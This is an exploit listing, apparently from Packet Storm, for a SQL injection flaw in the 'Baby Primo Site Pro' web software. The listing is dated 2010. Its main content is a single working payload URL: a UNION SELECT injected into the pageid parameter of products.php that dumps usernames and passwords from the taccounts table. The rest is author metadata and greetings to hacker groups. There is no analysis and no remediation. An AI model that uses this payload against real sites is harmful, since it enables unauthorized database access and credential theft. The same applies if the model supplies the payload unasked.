Baby Primo Site Pro SQL Injection

2010-06-23T00:00:00
ID PACKETSTORM:90889
Type packetstorm
Reporter JaMbA
Modified 2010-06-23T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Baby Primo Site Pro SQL injection Vulnerability  
# Date: 22/06/2010  
# Author: JaMbA  
# Vendor: www.totalprogress.nl  
# Version: N/A  
# Tested on: Windows & Linux  
# CVE : ()  
  
:::::::::::::::::::::::::  
  
:::::::::::::::::::::::::  
  
=================Exploit==================  
  
  
  
[ EXPL0!T ]  
  
  
http://server/products.php?pageid=-2+union+select+1,2,concat(taccounts_username,0x3a,taccounts_password),4,5,6,7,8,9,10,11+from+taccounts--  
  
  
  
===========================================================  
Good luck for the Algeria team Football in World Cup  
=========================  
  
Greetz to : Alnjm33-virus-pal - Predator-Ahmadso - xXx-jago-dz  
-inejcteur-4PY-SaYrOs- XR57 -Tr0y-x -alsaek  
And All Tunisian hacker  
  
=== SwT Labs ====  
  
  
  
`